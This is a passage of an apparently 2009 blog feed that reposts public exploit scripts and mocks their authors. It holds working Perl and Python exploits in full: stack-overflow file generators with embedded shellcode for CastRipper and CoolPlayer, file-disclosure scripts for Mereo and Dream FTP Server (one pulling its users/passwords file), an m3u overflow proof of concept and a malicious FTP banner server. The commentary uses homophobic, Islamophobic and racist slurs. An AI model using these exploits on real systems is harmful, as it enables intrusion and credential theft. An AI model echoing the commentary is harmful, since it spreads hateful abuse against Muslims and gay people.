src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-4768644173431365123</id><published>2009-05-12T23:58:00.000-07:00</published><updated>2009-05-13T00:03:04.153-07:00</updated><title type='text'>CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit</title><content type='html'>Main critism: (*DN9ysysy7F&amp;*SSFSKK8990ol;lIO89980`*BANGS HEAD ON KEYBOARD*89&amp;*n7``jnsdfd8u9d89udsf83ffdfd***BREAKS KEYBOARD***&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;# CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit&lt;br /&gt;# Exploited By : zAx&lt;br /&gt;# ThE-zAx@HoTMaiL.CoM&lt;br /&gt;print "CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit\n";&lt;br /&gt;print "Exploited By : zAx";&lt;br /&gt;print "Contact at : ThE-zAx@HoTMaiL.CoM";&lt;br /&gt;$header = "[playlist]\x0ANumberOfEntries=1\x0AFile1=http://";&lt;br /&gt;$junk = "\x41" x 26369;&lt;br /&gt;$eip="\x7D\xBC\x01\x10"; # Universal&lt;br /&gt;$nopsled = "\x90" x 10;&lt;br /&gt;# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com&lt;br /&gt;$shellcode =&lt;br /&gt;"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x88".&lt;br /&gt;"\xd3\x37\xcc\x83\xeb\xfc\xe2\xf4\x74\x3b\x73\xcc\x88\xd3\xbc\x89".&lt;br /&gt;"\xb4\x58\x4b\xc9\xf0\xd2\xd8\x47\xc7\xcb\xbc\x93\xa8\xd2\xdc\x85".&lt;br /&gt;"\x03\xe7\xbc\xcd\x66\xe2\xf7\x55\x24\x57\xf7\xb8\x8f\x12\xfd\xc1".&lt;br /&gt;"\x89\x11\xdc\x38\xb3\x87\x13\xc8\xfd\x36\xbc\x93\xac\xd2\xdc\xaa".&lt;br /&gt;"\x03\xdf\x7c\x47\xd7\xcf\x36\x27\x03\xcf\xbc\xcd\x63\x5a\x6b\xe8".&lt;br /&gt;"\x8c\x10\x06\x0c\xec\x58\x77\xfc\x0d\x13\x4f\xc0\x03\x93\x3b\x47".&lt;br /&gt;"\xf8\xcf\x9a\x47\xe0\xdb\xdc\xc5\x03\x53\x87\xcc\x88\xd3\xbc\xa4".&lt;br /&gt;"\xb4\x8c\x06\x3a\xe8\x85\xbe\x34\x0b\x13\x4c\x9c\xe0\x23\xbd\xc8".&lt;br /&gt;"\xd7\xbb\xaf\x32\x02\xdd\x60\x33\x6f\xb0\x56\xa0\xeb\xd3\x37\xcc";&lt;br /&gt;open(zax,"&gt;&gt;zAx.pls");&lt;br /&gt;print zax $header.$junk.$eip.$nopsled.$shellcode;&lt;br /&gt;print "[+] Done !! [+]";&lt;br /&gt;close(zax);&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;You cum guzzling metasploit ripping faggots! You probably don't even know the difference between INTEL and POWERPC chips! I HOPE MICROSHIT ADDS REAL BUFFER OVERFLOW PROTECTION JUST SO I DONT HAVE TO SLIT MY WRISTS EVERYTIME I SEE YOUR LAME TRIAL AND ERROR BULLSHIT EXPLOITS ON MILH0USE!&lt;br /&gt;&lt;br /&gt;NO NO NO THAT STILL WONT HELP, THEN YOU'LL JUST NEVER UPGRADE AND PUT DISCLAIMERS ON THE LAME FUCKING EXPLOITS LIKE "hey im musLIM this only workZ ON WINDOWS XP SP3 NOT 4 OR 5 OR 6 OR 7 OR 8 BECAUSE IM TOO FUCKING STUPID AND I RUIN EVERYTHING MY MOTHER FUCKED A GOAT YEAH SHE DID I FUCKED MY BROTHER AND SISTER IM A FUCKHEAD ARG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" Or something of that fucking nature bitchass towelheadZ!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-4768644173431365123?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/4768644173431365123/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/05/castripper-25070-pls-universal-stack.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/4768644173431365123'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/4768644173431365123'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/05/castripper-25070-pls-universal-stack.html' title='CastRipper 2.50.70 (.pls) Universal Stack Overflow Exploit'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-4816297611700835095</id><published>2009-05-12T23:57:00.000-07:00</published><updated>2009-05-12T23:58:34.595-07:00</updated><title type='text'>Mereo 1.8.0 Arbitrary File Disclosure Exploit</title><content type='html'>Main critism: HOLY SHIT MAW NOW IM A HACKER!@#&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;#!/usr/bin/perl -w&lt;br /&gt;#&lt;br /&gt;# Found By : Cyber-Zone (ABDELKHALEK)&lt;br /&gt;# Paradis_des_fous@hotmail.fr&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# Note : Don't use this for your own R!sk :d&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# Thanx To All Friends : Hussin X , Jiko , Stack , SimO-sofT , r1z , ZoRLu , Mag!c ompo , ThE g0bL!N , b0rizq , All MoroCCaN Hackers&lt;br /&gt;&lt;br /&gt;#&lt;br /&gt;# demo version Tested under my MS WINDOWS sp2&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;use LWP::Simple;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;&lt;br /&gt;print "\tMereo 1.8.0 Arbitrary File Disclosure Exploit\n";&lt;br /&gt;&lt;br /&gt;print "\t****************************************************************\n";&lt;br /&gt;print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";&lt;br /&gt;print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";&lt;br /&gt;print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";&lt;br /&gt;print "\t*               From : MoroccO Figuig/Oujda City               *\n";&lt;br /&gt;print "\t****************************************************************\n\n\n\n";&lt;br /&gt;&lt;br /&gt;if(@ARGV &lt; 4)&lt;br /&gt;{&lt;br /&gt;&amp;help; exit();&lt;br /&gt;}&lt;br /&gt;sub help()&lt;br /&gt;{&lt;br /&gt;print "[X] Usage : perl $0 HackerName IP Port File\n";&lt;br /&gt;print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 boot.ini\n";&lt;br /&gt;}&lt;br /&gt;($HackerName, $TargetIP, $AttackedPort, $TargetFile) = @ARGV;&lt;br /&gt;print("Please Wait ! Connecting To The Server ......\n\n");&lt;br /&gt;sleep(5);&lt;br /&gt;&lt;br /&gt;print("          ******************************\n");&lt;br /&gt;print("          *             Status         *\n");&lt;br /&gt;print("          ******************************\n");&lt;br /&gt;print("Loading ........................................\n\n\n");&lt;br /&gt;&lt;br /&gt;$temp="/";&lt;br /&gt;my $boom = "http://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;&lt;br /&gt;print("Exploiting .....&gt;    |80\n");&lt;br /&gt;sleep(15);&lt;br /&gt;print("Exploiting ..........|Done!\n");&lt;br /&gt;sleep(5);&lt;br /&gt;$Disclosure=get $boom;&lt;br /&gt;if($Disclosure){&lt;br /&gt;print("\n\n\n\n............File Contents Are Just Below...........\n");&lt;br /&gt;print("$Disclosure \n");&lt;br /&gt;print(".........................EOF.......................\n");&lt;br /&gt;print("Done For Fun //Figuigian HaCker\n");&lt;br /&gt;print("Some Womens Makes The World Special , Just By Being On it &lt;3\n");&lt;br /&gt;print("SEE U $HackerName\n\n\n");&lt;br /&gt;}&lt;br /&gt;else&lt;br /&gt;{&lt;br /&gt;print(" Not Found !!!\n\n");&lt;br /&gt;exit;&lt;br /&gt;}  &lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Y!s ho!y sh!t you lame fuckhead.. I bet your mother fucked a goat and had you, right?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-4816297611700835095?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/4816297611700835095/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/05/mereo-180-arbitrary-file-disclosure.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/4816297611700835095'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/4816297611700835095'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/05/mereo-180-arbitrary-file-disclosure.html' title='Mereo 1.8.0 Arbitrary File Disclosure Exploit'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-4474645322385807674</id><published>2009-05-05T20:14:00.000-07:00</published><updated>2009-05-05T20:15:50.742-07:00</updated><title type='text'>Sorinara Streaming Audio Player 0.9 (.m3u) Local Stack Overflow Exploit</title><content type='html'>Main critism: This fucking idiot just won't quit. QUIT FAGGOT, YOU SUCK!&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# Found By : Cyber-Zone (ABDELKHALEK)&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# Thanx To All Friends : Hussin X , Jiko , Stack , ZoRLu , ThE g0bL!N , r1z , Mag!c ompo , SimO-s0fT ... All MoroCCaN HaCkerS&lt;br /&gt;#&lt;br /&gt;# FIGUIG OwnZ !!!&lt;br /&gt;#&lt;br /&gt;# Streaming Audio Player 0.9  (.M3U File) Local Buffer Overflow PoC&lt;br /&gt;#&lt;br /&gt;#Olly Registers&lt;br /&gt;#EAX 00197D20&lt;br /&gt;#ECX 0000020E&lt;br /&gt;#EDX 00126F84&lt;br /&gt;#EBX 00193DAF&lt;br /&gt;#ESP 001270B8&lt;br /&gt;#EBP 7C81391C kernel32.GetFullPathNameA&lt;br /&gt;#ESI 00197D20&lt;br /&gt;#EDI 001272D0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;#EIP 41414141&lt;br /&gt;#&lt;br /&gt;my $Header = "#EXTM3U\n";&lt;br /&gt;my $ex="http://"."A" x 509;&lt;br /&gt;open(MYFILE,'&gt;&gt;buffer.m3u');&lt;br /&gt;print MYFILE $Header.$ex;&lt;br /&gt;close(MYFILE);&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;LEARN TO WRITE A REAL FUCKING EXPLOIT YOU PROOF OF SHIT!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-4474645322385807674?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/4474645322385807674/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/05/sorinara-streaming-audio-player-09-m3u.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/4474645322385807674'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/4474645322385807674'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/05/sorinara-streaming-audio-player-09-m3u.html' title='Sorinara Streaming Audio Player 0.9 (.m3u) Local Stack Overflow Exploit'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-2346148716820450751</id><published>2009-05-05T20:06:00.000-07:00</published><updated>2009-05-05T20:14:39.007-07:00</updated><title type='text'>32bit FTP (09.04.24) Banner Remote Buffer Overflow PoC</title><content type='html'>Main critism: Do these fuckups circle jerk until one of them comes up with the most idiotic name possible?&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;#! /usr/bin/perl&lt;br /&gt;#&lt;br /&gt;# A client side vulnerability in the product allows remote servers to cause the  client to crash by sending it a large banner.&lt;br /&gt;#  By: Load 99%&lt;br /&gt;#&lt;br /&gt;# website: http://www.electrasoft.com/32ftp.htm&lt;br /&gt;# Version:09.04.24&lt;br /&gt;#&lt;br /&gt;#0:005&gt; g&lt;br /&gt;# ...&lt;br /&gt;#(9b0.bac): Access violation - code c0000005 (first chance)&lt;br /&gt;#First chance exceptions are reported before any exception handling.&lt;br /&gt;#This exception may be expected and handled.&lt;br /&gt;#eax=41414141 ebx=00000001 ecx=000013e7 edx=0382ec14 esi=fffffffe edi=00000000&lt;br /&gt;#eip=41414141 esp=0382f018 ebp=0382f050 iopl=0         nv up ei pl nz na pe nc&lt;br /&gt;#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206&lt;br /&gt;#41414141 ??              ???&lt;br /&gt;#&lt;br /&gt;use IO::Socket::INET;&lt;br /&gt;&lt;br /&gt;my $socket = IO::Socket::INET-&gt;new('LocalPort' =&gt; 21,&lt;br /&gt;                   'Proto' =&gt; 'tcp',&lt;br /&gt;                   'Listen' =&gt; SOMAXCONN)&lt;br /&gt;    or die "Can't create socket ($!)\n";&lt;br /&gt;   &lt;br /&gt;print "Server listening\n";&lt;br /&gt;$data = "220 ".("\x41" x 5060)."\r\n";&lt;br /&gt;&lt;br /&gt;while (my $client = $socket-&gt;accept) {&lt;br /&gt;    print "send&gt; data.\n";&lt;br /&gt;    print $client $data;&lt;br /&gt;}&lt;br /&gt;die "Can't accept socket ($!)\n";&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;And the weiner is... Load 99%, who posted a lame EIP FUCKING OVERWRITE PROOF OF CONCEPT exploit for some no-name loser ftp client. What, the, fuck.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-2346148716820450751?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/2346148716820450751/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/05/32bit-ftp-090424-banner-remote-buffer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/2346148716820450751'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/2346148716820450751'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/05/32bit-ftp-090424-banner-remote-buffer.html' title='32bit FTP (09.04.24) Banner Remote Buffer Overflow PoC'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-8647849333330393873</id><published>2009-04-23T16:10:00.000-07:00</published><updated>2009-04-23T16:12:46.759-07:00</updated><title type='text'>Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit</title><content type='html'>Main critism: OH FUCK /me goes to turn off my shitty ass dream ftp server running on winblowz 3.11&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;#!/usr/bin/perl -w&lt;br /&gt;#&lt;br /&gt;# This Bug Similar to others found By My Friend : Stack &lt;= so special Thanx&lt;br /&gt;# So You Can Exploit Arbitrary File Disclosure From The Server &lt;== You can use Stack's Exploit To do That&lt;br /&gt;# But This Exploit i will get Users &amp; Passwords Of The applicatin From : users.dat : C:\Program Files\BolinTech\users.dat&lt;br /&gt;# In This Exploit I Used The Port 80 You can use any port you want 21&lt;br /&gt;#################################################################################################################################&lt;br /&gt;#23/04/2009 13:20:25  FTP Server started on port 80.&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] Client connected from 127.0.0.1.&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 220- ****************************************&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 220-&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 220-      Welcome to Dream FTP Server&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 220-      Copyright 2002 - 2004&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 220-      BolinTech Inc.&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 220-&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 220- ****************************************&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 220-&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 220  &lt;br /&gt;#23/04/2009 13:25:43  [0000000002] USER anonymous&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 331 Password required for anonymous&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] PASS **********&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 230 User successfully logged in.&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] PWD&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 257 "/" is current directory.&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] TYPE I&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 200 Type set to I&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] CWD Program Files&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 250 "/Program Files" is current directory.&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] CWD BolinTech&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 250 "/Program Files/BolinTech" is current directory.&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] MDTM users.dat&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 502 Command not implemented - Try HELP.&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] PASV&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 227 Entering Passive Mode (127,0,0,1,11,145).&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] RETR users.dat&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 150 Opening BINARY mode data connection for file transfer.&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] 226 Transfer complete&lt;br /&gt;#23/04/2009 13:25:43  [0000000002] Client disconnected from 127.0.0.1.&lt;br /&gt;#################################################################################################################################&lt;br /&gt;# Download Product : http://www.softpedia.com/progDownload/Dream-FTP-Server-Download-47248.html&lt;br /&gt;# Special Thanx To All My Friends : Hussin X , ZoRLu , Jiko , Stack , SimO-sofT , Mag!c ompo , b0rizq , All MoroCCaN Hackers&lt;br /&gt;#################################################################################################################################&lt;br /&gt;# welcome To : WwW.Ma-HaxOrZ.CoM/vb &lt;== Is Online&lt;br /&gt;#################################################################################################################################&lt;br /&gt;# Screenshot From My MS SP2 FR when exploiting in localhost : http://www.exploiter5.com/blog/Disclosure.png&lt;br /&gt;#################################################################################################################################&lt;br /&gt;use LWP::Simple;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt;&lt;br /&gt;print "\tDream FTP Server 1.02 (users.dat) Passwords/users Disclosure Exploit\n";&lt;br /&gt;&lt;br /&gt;print "\t****************************************************************\n";&lt;br /&gt;print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";&lt;br /&gt;print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";&lt;br /&gt;print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";&lt;br /&gt;print "\t*               From : MoroccO Figuig/Oujda City               *\n";&lt;br /&gt;print "\t****************************************************************\n\n\n\n";&lt;br /&gt;&lt;br /&gt;if(@ARGV &lt; 3)&lt;br /&gt;{&lt;br /&gt;&amp;help; exit();&lt;br /&gt;}&lt;br /&gt;sub help()&lt;br /&gt;{&lt;br /&gt;print "[X] Usage : perl $0 HackerName IP Port \n";&lt;br /&gt;print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 \n";&lt;br /&gt;}&lt;br /&gt;($HackerName, $TargetIP, $AttackedPort) = @ARGV;&lt;br /&gt;print("Please Wait ! Connecting To The Server ......\n\n");&lt;br /&gt;sleep(5);&lt;br /&gt;&lt;br /&gt;print("          ******************************\n");&lt;br /&gt;print("          *             Status         *\n");&lt;br /&gt;print("          ******************************\n");&lt;br /&gt;print("$HackerName , AttaCking The Target : $TargetIP \n");&lt;br /&gt;print("On The Port : $AttackedPort , Just To Get Users/Passwords File :d\n");&lt;br /&gt;$terget1="Program Files";&lt;br /&gt;$target2="BolinTech";&lt;br /&gt;$target3="users.dat";&lt;br /&gt;$slash="/";&lt;br /&gt;$TargetFile=$terget1.$slash.$target2.$slash.$target3;&lt;br /&gt;$temp="/" x 2;&lt;br /&gt;my $boom = "ftp://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile;&lt;br /&gt;print("Exploiting .....&gt;    |80\n");&lt;br /&gt;sleep(15);&lt;br /&gt;print("Exploiting ..........|Done!\n");&lt;br /&gt;sleep(5);&lt;br /&gt;$Disclosure=get $boom;&lt;br /&gt;print("\n\n\n\n............File Contents Are Just Below...........\n");&lt;br /&gt;print("$Disclosure \n");&lt;br /&gt;print(".........................EOF.......................\n");&lt;br /&gt;print("Done For Fun //Figuigian HaCker\n");&lt;br /&gt;print("Some Womens Makes The World Special , Just By Being On it &lt;3\n");&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Seriously, write a proper exploit you lame ass.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-8647849333330393873?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/8647849333330393873/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/dream-ftp-server-102-usersdat-arbitrary.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8647849333330393873'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8647849333330393873'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/dream-ftp-server-102-usersdat-arbitrary.html' title='Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-4695236008706133708</id><published>2009-04-23T16:06:00.000-07:00</published><updated>2009-04-23T16:08:21.976-07:00</updated><title type='text'>CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow Exploit</title><content type='html'>Main critism: WHAT IN THE NAME OF COCK SUCKING ALLAH MUHAMMAD SHIT FACE IS WITH FAGGOTS WRITING 9834894389284 EXPLOITS FOR ONE OR TWO SHITTY BUGS!?&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;# CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow exploit&lt;br /&gt;# Credit To Gold_m http://www.milw0rm.com/exploits/8489&lt;br /&gt;# By Stack Sysworm.com&lt;br /&gt;# Note abouts this Exploit : right click &gt;&gt; Option &gt;&gt; Open &gt;&gt; select our target file and boooooom calc executed :d&lt;br /&gt;# Note abouts the last exploit (m3u): my first Exploit Have just 212 + 4 - Junk + eip i dont know why didin't be the same for my sweety freind His0ka&lt;br /&gt;# When i test He's exploit it didin't work and the ret adress be far from eip register and it overwrited by A's junk i dont know why but i think the junk change from box to box&lt;br /&gt;# Thnx for all freind ( Jadi - Mr.Safa7 - Hod - His0ka - Djekmani etc ......&lt;br /&gt;# Thnx for the great str0ke thnx for your support :d&lt;br /&gt;chars = "\x41" * 1504&lt;br /&gt;eip = "\xED\x1E\x94\x7C" # ntdll.dll jmp esp SP 2 FR / EN&lt;br /&gt;header = "[CoolPlayer Skin]\nPlaylistSkin="&lt;br /&gt;# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com&lt;br /&gt;shellcode = (&lt;br /&gt;"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"&lt;br /&gt;"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"&lt;br /&gt;"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"&lt;br /&gt;"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"&lt;br /&gt;"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"&lt;br /&gt;"\x42\x30\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x48\x4e\x37"&lt;br /&gt;"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"&lt;br /&gt;"\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"&lt;br /&gt;"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"&lt;br /&gt;"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"&lt;br /&gt;"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x38"&lt;br /&gt;"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x34"&lt;br /&gt;"\x4b\x58\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"&lt;br /&gt;"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x53"&lt;br /&gt;"\x42\x4c\x46\x56\x4b\x38\x42\x54\x42\x43\x45\x58\x42\x4c\x4a\x57"&lt;br /&gt;"\x4e\x50\x4b\x58\x42\x44\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"&lt;br /&gt;"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"&lt;br /&gt;"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x33\x4f\x55\x41\x53"&lt;br /&gt;"\x48\x4f\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x57"&lt;br /&gt;"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x56\x4a\x49"&lt;br /&gt;"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56"&lt;br /&gt;"\x4e\x36\x43\x56\x50\x52\x45\x36\x4a\x37\x45\x46\x42\x50\x5a")&lt;br /&gt;poc = (header+chars+eip+"\x90"*10+shellcode)&lt;br /&gt;file = open('skin.ini','w+')&lt;br /&gt;file.write(poc)&lt;br 